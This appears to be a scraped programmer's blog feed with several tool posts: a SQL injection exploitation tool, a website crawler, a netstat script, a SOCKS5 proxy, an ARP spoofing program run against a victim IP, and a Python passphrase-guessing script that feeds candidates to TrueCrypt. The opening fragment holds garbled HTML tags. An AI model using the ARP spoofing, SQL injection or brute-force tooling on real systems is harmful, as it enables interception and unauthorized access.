"0.5" as the timeout.<br /><br />- usage <command></command><command></command></pretty|plain></pretty|plain></on|off></on|off></union|blind></union|blind></schemas|tables|columns><COMMAND><schemas|tables|columns><union|blind><union|blind><on|off><on|off><pretty|plain><pretty|plain>: Print the usage for the command COMMAND.<br /><br />- exit: Exit The Mole. </pretty|plain></pretty|plain></on|off></on|off></union|blind></union|blind></schemas|tables|columns></blockquote>
<div style="text-align: center;">
<b>Example</b> </div>
<blockquote>
<schemas|tables|columns><union|blind><union|blind><on|off><on|off><pretty|plain><pretty|plain>
<br />
This is a video of The Mole exploiting a SQL Injection, first using union mode, and then using blind mode:<br />
<br />
</pretty|plain></pretty|plain></on|off></on|off></union|blind></union|blind></schemas|tables|columns><br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/H3DjiIcDNZ4?feature=player_embedded' frameborder='0'></iframe></div>
<br /></blockquote>
<div style="text-align: center;">
<b>Download</b> </div>
<blockquote>
<br />
In order to download The Mole, you can visit the project's sourceforge entry: <a href="https://sourceforge.net/projects/themole">https://sourceforge.net/projects/themole</a>.<br />
<table>
</table>
<table></table>
</blockquote>Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com3tag:blogger.com,1999:blog-6806868022885060269.post-37055453334546947592011-09-27T23:52:00.000-03:002011-09-30T20:29:48.525-03:00Hound: Website crawlerHound is a website crawler i developed a couple of months ago. Today i'm releasing the 0.11 version, which includes some bug fixes and new features.<br />
<br />
The crawler starts by crawling a given <i>base URL</i>. It then analyses its html code and searches for other URLs which will be collected and will be enqueued for analysis.<br />
<br />
The crawler's behaviour is based on plugins. Different kinds of plugins affect it in a different way. One can, for example, activate certain <i>Filter Plugins</i> which will restrict the URLs the crawler will visit, based on each plugin's behaviour. It could be undesirable, under most circumstances, to allow Hound to visit google, facebook, or youtube. This is why a HostFilter can be used, making the crawler only visit URLs that belong to the base host.<br />
<br />
There are different types of plugins, each executed on a certain phase of the crawling session. These can be:<br />
<ul>
<li>Parsers: These are applied to downloaded html in order to normalise it so that the other plugins are able to collect data without worrying about aspects such as which encoding is used, html entities.</li>
<li>Crawl filters: These are applied to every URL found. If a crawl filter matches a certain URL, then the latter is discarded. Host, extension and network filters are examples of them.</li>
<li>Collect filters: These filters are applied to collected URLs, so that they are not taken into account in the crawling results. Again, you might not want to include google links in the results.</li>
<li>Form collect filters: These filters are applied to form tags found in html files.</li>
<li>Header filters: These are applied to a downloaded file's headers. They are usually used when filtering mime-types, for example. </li>
<li>Collectors: The most important plugins. These take care of analysing the html files, parsing <i>href </i>or <i>src</i> attributes, among others, and feeding the crawler with new URLs.</li>
</ul>
The file <i>hound.conf</i> contains a list of active plugins, including their arguments. Once you've picked the right configuration, you can start a crawling session by executing:<br />
<blockquote>
./hound http://website.to.crawl.com</blockquote>
The output will be <b>only</b> be written to stdout. If you want to store it in a file, you can do it by using the <i>-o</i> parameter, followed by its path. This will write the results both to stdout and to the given file. If you don't want to write results to stdout, use the <i>-n</i> parameter.<br />
<br />
Once the crawl session has ended, you can use hound to parse the results. Run the following command to list the URLs found:<br />
<blockquote>
./hound -i /tmp/hound.out -p urls</blockquote>
Where <i>/tmp/hound.</i>out is the output file used during the crawling session. You can always parse the results manually, since they're stored in text files. To list all the form tags found, execute:<br />
<blockquote>
./hound -i /tmp/hound.out -p forms</blockquote>
Which will print something like:<br />
<blockquote>
0 POST http://blablabla/search cms_search --- hidden +++ query --- text +++ commit --- image<br />
1 POST http://blablabla/contact/send article_id --- hidden +++ subject --- text +++ sender_name --- text +++ sender_mail --- text +++ reset --- reset</blockquote>
The number on the left of each line identifies each form. This is the way hound uses to encode forms. To generate the html code for a given form id, run:<br />
<blockquote>
./hound -i /tmp/hound.out -p form:0</blockquote>
Which will print the html code for the first form.<br />
<br />
In order to download hound, you can visit the <a href="http://sourceforge.net/projects/houndwc/">sourceforge project's site</a>. It is open source, developed using python so you can have a look at the code and create new plugins to serve your needs.<br />
<ul>
</ul>
Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com0tag:blogger.com,1999:blog-6806868022885060269.post-22626513503758185002011-09-08T00:00:00.000-03:002011-09-08T00:09:50.621-03:00Netstat shellscriptThis is a shellscript i coded a couple of month ago, after i found my router didn't have this utility, and wanted to check its active connections. <br />
<br />
It only displays TCP connections, printing the source and destination IP address and port of each of them. The script requires the <i>sh</i> shell interpreter, making it possible to use it in systems which don't have other interpreters like <i>bash</i>, which provides several features which would make the script simpler.<br />
<br />
This is the script:<br />
<br />
<pre class="brush: bash"><br />
#!/bin/sh
parse_num()
{
x=$(echo $1 | sed -n 's/0*//p')
if [ $(echo $x | wc -c) -eq 1 ]
then
x=0
fi
echo $x
}
hex_to_ip()
{
index=7
output=''
while [ $index -gt 0 ]
do
end=$(expr $index + 1)
value=$(printf "%d" "0x$(parse_num $(echo $1 | cut -b $index-$end))")
output="$output.$value"
index=$(expr $index - 2)
done
echo $(echo $output | cut -b 2-)
}
printf " Src IP Src port Dst IP Dst port\n"
cat /proc/net/tcp | while read line; do
srcip=$(hex_to_ip $(echo $line | sed -n 's/^[0-9]*: //p' | sed 's/:.*//p'))
srcport=$(printf "%d" 0x$(parse_num $(echo $line | sed -n 's/^ *[0-9]*: [0-9,A-F]*://p' | cut "-d " -f 1)))
dstip=$(hex_to_ip $(echo $line | sed -n 's/^[0-9]*: [0-9,A-F]*:[0-9,A-F]* //p' | sed -n 's/:.*//p'))
dstport=$(printf "%d" 0x$(parse_num $(echo $line | sed -n 's/^ *[0-9]*: [0-9,A-F]*:[0-9,A-F]* [0-9,A-F]*://p' | cut "-d " -f1)))
printf "%15s %9s %15s %9s\n" $srcip $srcport $dstip $dstport
done <br />
</pre>
<br />
<br />
An output example:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpMv-SnQuAEE50we6gPPN4guYYi9AnkIzTHv-QiSCdqOdBJsxBT92ZIa2Ts_lS_t7IftHpuBWkutXEDUZPy3QLyEwmmsrYaBddoiH5ZilD-U6puythrnNgfz18L4bUy97jTX9yapymWOia/s1600/netstat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpMv-SnQuAEE50we6gPPN4guYYi9AnkIzTHv-QiSCdqOdBJsxBT92ZIa2Ts_lS_t7IftHpuBWkutXEDUZPy3QLyEwmmsrYaBddoiH5ZilD-U6puythrnNgfz18L4bUy97jTX9yapymWOia/s400/netstat.png" width="367" /></a></div>
<br />Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com0tag:blogger.com,1999:blog-6806868022885060269.post-21414445060778632502011-09-05T18:50:00.001-03:002011-09-26T19:25:13.423-03:00Simple socks5 server in C++This is a socks5 proxy server i implemented a few months ago. It's developed in C++, and as far as i have tested, works pretty well. There are a couple of things left to do, like handling domain name connection requests, or do a better thread handling, but it has served its purpose so far. <br />
<br />
In order to compile it, you can use the GNU C++ compiler, and linking the application with libpthread:<br />
<blockquote>
g++ -o socks5 socks5.cpp -lpthread</blockquote>
By default it only accepts authenticated connections, using the USERNAME define as username, and the PASSWORD define as password. If you want to allow unauthenticated connection requests, add a -DALLOW_NO_AUTH flag when compiling.<br />
<br />
The proxy server listens on port 5555, you might as well want to change the SERVER_PORT define if you want it to wait for connections on another port.<br />
<br />
The source code can be downloaded from github: <a href="https://github.com/mfontanini/Programs-Scripts/blob/master/socks5/socks5.cpp">https://github.com/mfontanini/Programs-Scripts/blob/master/socks5/socks5.cpp</a>.<br />
<br />
Hope you find it useful!Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com10tag:blogger.com,1999:blog-6806868022885060269.post-59156662029938675592011-09-03T12:39:00.001-03:002013-11-24T13:14:36.634-03:00ARP spoofing using libtinsThis is an example program I created to test <i><a href="http://libtins.github.io/">libtins</a></i>, a library I've been developing with some colleagues. This library allows the user to forge packets, from link layer to transport or even application layer, in C++ by creating their own <i>PDU</i> stack and sending them without worrying about raw sockets, endianness, nor low level socket handling. <br />
<br />
To use this program, compile it and link it with libtins. Using GNU C++ compiler, this could be done this way:<br />
<blockquote>
g++ -o arpspoofing arpspoofing.cpp -ltins</blockquote>
<br />
And then execute it using the gateway and victim's IP addresses as arguments, for example:<br />
<blockquote>
./arpspoofing 192.168.0.1 192.168.0.100</blockquote>
This code snippet is included as an example in <i>libtins </i>source code, inside the <i>examples</i> folder. You can have a look at it online <a href="http://libtins.github.io/examples/arp-spoof">here</a>.Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com0tag:blogger.com,1999:blog-6806868022885060269.post-10922834358995093002011-09-02T16:20:00.001-03:002011-09-02T16:27:48.170-03:00Password combination generatorAfter several months without mounting an encrypted filesystem, i found out i had forgotten its passphrase. However, i remembered the words i had used, but not the case sensitivity of each character nor the characters i'd replaced for numbers or symbols('o' for '0', 's' for '5', etc). Moreover, i didn't remember which symbol i'd used to separate these words(i could have used '_', '!', '#', etc..).<br />
<br />
So after spending half an hour trying out every combination of upper and lower case characters, digits and symbols, i came out with a script to do this automatically.<br />
<br />
This script expects several words in lower case as arguments, printing them in the same order, but modifying their case, and transforming characters to numbers or symbols, using a conversion map. There's also a '-e' parameter which allows the user to directly execute a certain command for each combination. The command to execute must contain the string "{0}", which will indicate where each combination will be replaced.<br />
<br />
For example, in my quest to mount my encrypted file, i used:<br />
<blockquote>./dictionary.py -e "truecrypt -p {0} --non-interactive encrypted.file" one two three</blockquote>Where "one two three" are the words which will be used the perform character combinations.<br />
<br />
This is the script:<br />
<br />
<pre class="brush: python">#!/usr/bin/python
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
import sys, os
class Word:
# Dictionary used for conversions between characters, other than
# simple lower-to-upper conversions. Add here as many as you want,
# as long as you don't create a cycle ;).
leet_map = {'A' : '4',
'E' : '3',
'I' : '1',
'O' : '0',
'1' : '!',
'S' : '5',
'5' : '$'
}
# The characters to append after each word. Only one of these will
# be appended at a time.
appended_list = [' ', '!', '_']
# Appended characters to avoid if this Word is last in the sequence.
# By default, no spaces will be appended at the end of the phrase,
# however, they will be included in the middle of it.
appended_list_avoid = [' ']
def __init__(self, base, is_last = False):
self.base = list(base)
self.current = list(base)
self.current_index = 0
self.is_last = is_last
self.appended = ''
self.done = False
# Increment a particular character. Add any conversion rules in here.
def _next_char(self, char):
if char.isalpha():
if char.islower():
return char.upper()
else:
if char in Word.leet_map:
return Word.leet_map[char]
return char
else:
return char if not char in Word.leet_map else Word.leet_map[char]
# Increment the word. Should only be called if has_next returns True.
def next(self):
this_char = self._next_char(self.current[self.current_index])
if this_char == self.current[self.current_index]:
# No more conversions for this char, reset previous ones.
for i in range(self.current_index + 1):
self.current[i] = self.base[i]
self.current_index += 1
if self.current_index < len(self.base):
self.next()
self.current_index = 0
else:
# Find the current appended character
try:
index = Word.appended_list.index(self.appended)
except:
index = -1
if index == len(Word.appended_list) - 1:
# Appended char cannot be incremented. We're done.
self.done = True
else:
try:
if self.is_last:
while Word.appended_list[index+1] in Word.appended_list_avoid:
index += 1
# Increment the appended character.
self.appended = Word.appended_list[index+1]
self.current_index = 0
except:
self.done = True
else:
self.current[self.current_index] = this_char
# Returns boolean indicating whether this Word can be incremented.
def has_next(self):
return not self.done
# Returns the current string.
def get_current(self):
return ''.join(self.current) + self.appended
# Resets every field in this Word.
def reset(self):
self.current = list(self.base)
self.current_index = 0
self.appended = ''
self.done = False
class Wordlist:
def __init__(self, words):
self.words = []
for i in words[:-1]:
self.words.append(Word(i))
self.words.append(Word(words[-1], True))
# Increment the words one step.
def _inc(self, index):
# No words to increment left
if index == len(self.words):
return index
if self.words[index].has_next():
self.words[index].next()
if not self.words[index].has_next():
# We've got carry. Reset words[0:index],
# then increment words[index+1] and propagate.
for i in range(index+1):
self.words[i].reset()
return self._inc(index+1)
else:
return index
else:
return index + 1
def do_action(self, to_exec):
line = ''.join(map(lambda x: ''.join(x.get_current()), self.words))
if len(to_exec) == 0:
print line
else:
os.system(to_exec.format('"' + line + '"'))
def generate(self, to_exec):
i = 0
while i < len(self.words):
self.do_action(to_exec)
i = self._inc(0)
def usage():
print ' Usage: ' + sys.argv[0] + ' [-e EXEC] <WORD1> [WORD2] [WORD3]\n'
print ' If -e option is used, then the next parameter is the command to execute'
print ' for each word combination. The command must contain {0} where each '
print ' combination will be included. Example: "echo {0}"\n'
print ' If no command is given, then each permutation will be printed to stdout'
exit(1)
if __name__ == '__main__':
if len(sys.argv) == 1 or '-h' in sys.argv:
usage()
args = sys.argv[1:]
to_exec = ''
if args[0] == '-e':
if len(args) <= 2:
usage()
to_exec = args[1]
args = args[2:]
words = Wordlist(args)
words.generate(to_exec)
</pre><br />
<br />
<br />
Hope you find it useful!Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com1